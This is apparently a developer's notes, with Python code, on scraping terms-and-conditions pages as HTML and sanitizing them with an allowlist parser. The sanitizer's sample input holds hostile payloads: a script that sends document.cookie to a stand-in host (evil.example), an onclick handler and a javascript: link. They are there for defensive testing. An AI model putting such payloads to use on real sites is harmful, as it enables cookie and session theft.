For scraping terms and conditions data, I should scrape the HTML instead of the plain text.
The HTML keeps external links that may be useful, whereas pulling only the text throws those links away.
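A minimal sketch of the difference, using only Python's standard-library `html.parser`. The `LinkAndTextExtractor` class and the sample snippet are hypothetical, for illustration only. The text-only view drops the URL, while the HTML still carries it.

```python
from html.parser import HTMLParser


class LinkAndTextExtractor(HTMLParser):
    """Hypothetical helper: collects visible text and every <a href> in a fragment."""

    def __init__(self):
        super().__init__()
        self.text_parts = []
        self.links = []

    def handle_starttag(self, tag, attrs):
        # Record the href of every anchor tag; a text-only scrape never sees these.
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.links.append(href)

    def handle_data(self, data):
        # Text between tags: this is all a text-only scrape would keep.
        self.text_parts.append(data)

    def text(self):
        return "".join(self.text_parts)


# Hypothetical snippet of a terms-and-conditions page.
SAMPLE = (
    '<p>By using this site you agree to our '
    '<a href="https://example.com/privacy">Privacy Policy</a>.</p>'
)

parser = LinkAndTextExtractor()
parser.feed(SAMPLE)
parser.close()

print(parser.text())  # → By using this site you agree to our Privacy Policy.
print(parser.links)   # → ['https://example.com/privacy']
```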
Scraping the HTML also preserves styling markup such as <b>, <strong>, or <i>, which will render automatically when the content is displayed as regular HTML.
I need to be careful to filter out any <script> tags, since the scraped page may contain malicious code.
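A rough sketch of the filtering step, again using only the standard library. Stripping `<script>` alone is not quite enough: event-handler attributes like `onclick` and `javascript:` URLs can also run code. So this sketch swaps in an allowlist approach instead: keep a small set of formatting tags, drop everything else, drop the contents of `<script>`/`<style>`, and keep only `http(s)` links. The tag list (`ALLOWED_TAGS`) and the `sanitize` helper are assumptions, not a settled design. It also does not balance unclosed tags, so a maintained sanitizer library is the safer choice for anything beyond a prototype.

```python
from html import escape
from html.parser import HTMLParser

# Assumption: formatting tags worth keeping in terms-and-conditions text.
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u",
                "ul", "ol", "li", "a", "h1", "h2", "h3"}
# Tags whose contents must be discarded too, not just the tags themselves.
DROP_CONTENT_TAGS = {"script", "style"}
# Tags that never get a closing tag in the output.
VOID_TAGS = {"br"}


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = ""
        if tag == "a":
            href = dict(attrs).get("href") or ""
            # Keep only http(s) links; rejects javascript: and data: URLs.
            if href.lower().startswith(("http://", "https://")):
                kept = f' href="{escape(href, quote=True)}"'
        # Every other attribute (onclick, style, ...) is silently dropped.
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Re-escape text so decoded entities like &lt; cannot become markup.
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))


def sanitize(fragment: str) -> str:
    """Hypothetical helper: return an allowlisted copy of an HTML fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


dirty = (
    '<p onclick="steal()">Read our <strong>refund policy</strong> '
    '<a href="https://example.com/refunds">here</a> and '
    '<a href="javascript:alert(1)">not here</a>.</p>'
    '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
)
print(sanitize(dirty))
# → <p>Read our <strong>refund policy</strong> <a href="https://example.com/refunds">here</a> and <a>not here</a>.</p>
```

The styling tags and the real link survive, while the script, the `onclick` handler, and the `javascript:` URL are removed.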